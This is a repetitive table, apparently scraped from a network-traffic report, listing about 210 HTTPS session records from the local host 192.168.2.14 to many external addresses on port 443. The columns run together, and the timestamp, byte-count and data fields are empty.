                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14298192.168.2.1459988160.73.137.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14299192.168.2.1460714123.228.53.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14300192.168.2.1444336161.171.250.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14301192.168.2.145340683.120.238.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14302192.168.2.1455868209.103.158.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14303192.168.2.143612459.214.250.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14304192.168.2.144450490.250.102.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14305192.168.2.145600039.169.214.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14306192.168.2.1445518192.17.77.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14307192.168.2.1445164126.67.244.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14308192.168.2.145408054.160.216.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14309192.168.2.146054425.206.237.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14310192.168.2.1438618139.28.121.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14311192.168.2.1452726156.39.45.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14312192.168.2.144965087.255.144.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14313192.168.2.143990089.64.161.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14314192.168.2.1454640223.46.56.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14315192.168.2.1444826140.13.205.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14316192.168.2.1452994112.44.140.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14317192.168.2.1437016132.177.83.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14318192.168.2.1456924185.59.9.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14319192.168.2.144594234.117.103.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14320192.168.2.143523274.135.10.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14321192.168.2.1444008103.16.47.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14322192.168.2.143908058.162.55.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14323192.168.2.1434218206.75.143.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14324192.168.2.1452740140.64.91.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14325192.168.2.143286889.16.15.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14326192.168.2.1450814155.49.57.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14327192.168.2.1444766206.108.206.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14328192.168.2.144194444.170.62.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14329192.168.2.1452654208.160.146.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14330192.168.2.1448432208.255.6.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14331192.168.2.143389420.16.71.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14332192.168.2.1439766156.155.179.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14333192.168.2.1437412124.55.114.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14334192.168.2.1460742201.156.190.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14335192.168.2.1441490200.217.38.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14336192.168.2.1439114189.90.152.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14337192.168.2.1441120150.59.26.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14338192.168.2.1446136143.121.35.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14339192.168.2.144265442.157.20.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14340192.168.2.1444180216.86.88.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14341192.168.2.1458118204.11.153.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14342192.168.2.145058441.22.255.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14343192.168.2.1433418198.33.1.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14344192.168.2.1436918170.169.161.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14345192.168.2.1458484210.248.123.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14346192.168.2.1446844205.233.58.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14347192.168.2.1445344164.118.206.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14348192.168.2.145464446.162.207.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14349192.168.2.1448444162.111.151.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14350192.168.2.14485209.150.203.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14351192.168.2.1437776139.130.246.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14352192.168.2.144158638.214.202.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14353192.168.2.1440124124.66.251.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14354192.168.2.1458078142.99.141.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14355192.168.2.1440512146.146.32.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14356192.168.2.1448022159.84.89.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14357192.168.2.145539263.230.96.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14358192.168.2.143759854.184.168.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14359192.168.2.143471469.29.105.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14360192.168.2.1439440160.161.49.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14361192.168.2.1460592148.174.231.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14362192.168.2.1436586144.226.45.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14363192.168.2.146083817.220.84.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14364192.168.2.144330431.167.30.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14365192.168.2.145623058.222.173.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14366192.168.2.145094238.207.12.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14367192.168.2.1433900123.207.82.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14368192.168.2.1440154145.183.145.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14369192.168.2.145636032.158.25.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14370192.168.2.144754091.250.111.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14371192.168.2.144048874.52.50.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14372192.168.2.1458088143.165.23.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14373192.168.2.144020897.170.215.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14374192.168.2.1447956191.224.89.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14375192.168.2.1449324199.92.226.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14376192.168.2.1439770111.209.30.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14377192.168.2.1459414153.230.89.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14378192.168.2.143949099.81.26.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14379192.168.2.145349832.238.210.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14380192.168.2.14431721.73.107.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14381192.168.2.14474381.212.73.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14382192.168.2.1459688160.122.103.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14383192.168.2.1458714202.81.220.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14384192.168.2.1453014161.206.18.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14385192.168.2.1439048132.45.186.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14386192.168.2.1449520205.46.59.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14387192.168.2.1445124169.215.4.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14388192.168.2.1453770100.202.236.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14389192.168.2.144621612.82.2.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14390192.168.2.144290676.238.6.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14391192.168.2.1437578183.81.33.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14392192.168.2.144754679.103.69.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14393192.168.2.145159281.254.54.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14394192.168.2.1451010119.190.244.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14395192.168.2.144641483.163.165.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14396192.168.2.145013275.111.240.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14397192.168.2.144360067.38.240.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14398192.168.2.1442380206.57.210.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14399192.168.2.1460616116.219.103.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14400192.168.2.1436228110.19.132.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14401192.168.2.144016460.105.200.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14402192.168.2.1437420149.223.69.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14403192.168.2.145547074.192.188.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14404192.168.2.1452152140.223.16.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14405192.168.2.1438160180.180.220.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14406192.168.2.1449106192.75.255.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14407192.168.2.1435234193.234.74.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14408192.168.2.1439962113.225.224.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14409192.168.2.145881469.227.175.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14410192.168.2.1438404209.136.156.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14411192.168.2.1442268126.231.205.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14412192.168.2.1444756191.231.201.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14413192.168.2.1440730137.143.156.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14414192.168.2.1454682169.151.143.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14415192.168.2.144555088.202.142.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14416192.168.2.1458276206.31.131.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14417192.168.2.1454436175.214.65.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14418192.168.2.1460320194.138.129.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14419192.168.2.1453904153.42.62.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14420192.168.2.1460394168.224.242.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14421192.168.2.145105034.168.199.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14422192.168.2.1452408196.209.126.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14423192.168.2.1446150203.52.240.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14424192.168.2.1446168160.126.222.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14425192.168.2.145800472.182.89.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14426192.168.2.145358664.59.72.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14427192.168.2.1452742158.95.196.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14428192.168.2.1434218169.161.101.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14429192.168.2.1446654176.11.0.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14430192.168.2.144379464.136.16.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14431192.168.2.145993881.7.135.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14432192.168.2.143994650.234.231.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14433192.168.2.1448952172.136.212.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14434192.168.2.1458894183.236.232.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14435192.168.2.146026843.186.244.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14436192.168.2.143619644.147.151.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14437192.168.2.1435602138.27.22.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14438192.168.2.1455330206.234.115.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14439192.168.2.145699257.112.244.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14440192.168.2.1452588105.153.208.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14441192.168.2.144278640.85.216.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14442192.168.2.1433922107.129.141.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14443192.168.2.143944495.45.62.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14444192.168.2.143933279.112.189.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14445192.168.2.1433834209.56.86.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14446192.168.2.1448612219.143.149.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14447192.168.2.1460362166.142.76.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14448192.168.2.143590892.204.195.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14449192.168.2.1440188170.136.47.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14450192.168.2.145406464.213.250.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14451192.168.2.143959665.211.238.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14452192.168.2.1451618171.114.87.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14453192.168.2.1436140131.45.5.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14454192.168.2.1446232109.207.212.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14455192.168.2.143287827.32.36.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14456192.168.2.1445780188.255.40.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14457192.168.2.1450422143.43.169.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14458192.168.2.1449932145.107.100.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14459192.168.2.1455792109.183.46.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14460192.168.2.1437044205.132.153.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14461192.168.2.1441428125.14.198.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14462192.168.2.1457572184.189.214.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14463192.168.2.1451926195.127.214.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14464192.168.2.145257283.63.203.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14465192.168.2.1459854166.161.46.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14466192.168.2.1434864143.142.70.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14467192.168.2.1450368120.56.165.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14468192.168.2.1453736213.241.165.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14469192.168.2.1443558158.73.52.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14470192.168.2.1439768201.201.204.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14471192.168.2.144547663.135.22.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14472192.168.2.145647817.26.247.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14473192.168.2.145196468.79.195.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14474192.168.2.145421419.189.8.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14475192.168.2.1443388173.172.181.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14476192.168.2.1453244133.239.74.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14477192.168.2.143787418.138.246.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14478192.168.2.1452206123.41.107.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14479192.168.2.14518085.85.213.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14480192.168.2.144313443.207.19.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14481192.168.2.143694669.224.78.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14482192.168.2.144284886.69.97.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14483192.168.2.1446540222.19.142.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14484192.168.2.1459454178.59.229.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14485192.168.2.143926888.134.32.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14486192.168.2.1434618166.75.246.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14487192.168.2.1452374208.123.37.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14488192.168.2.1458278102.119.111.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14489192.168.2.1454044154.231.253.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14490192.168.2.1460262136.104.7.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14491192.168.2.1440018182.63.162.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14492192.168.2.145904287.220.71.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14493192.168.2.1447594203.65.90.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14494192.168.2.145688244.171.205.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14495192.168.2.1450694200.113.254.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14496192.168.2.1442056217.194.206.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14497192.168.2.143729863.24.251.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14498192.168.2.145157250.241.167.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14499192.168.2.1442028213.130.159.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14500192.168.2.1459750172.139.89.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14501192.168.2.146019293.99.68.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14502192.168.2.1452834119.225.59.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14503192.168.2.14529905.33.175.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14504192.168.2.144411872.194.146.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14505192.168.2.143308060.230.61.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14506192.168.2.1436170102.35.166.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14507192.168.2.144856678.183.187.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14508192.168.2.1438952155.183.158.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14509192.168.2.145555247.49.208.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
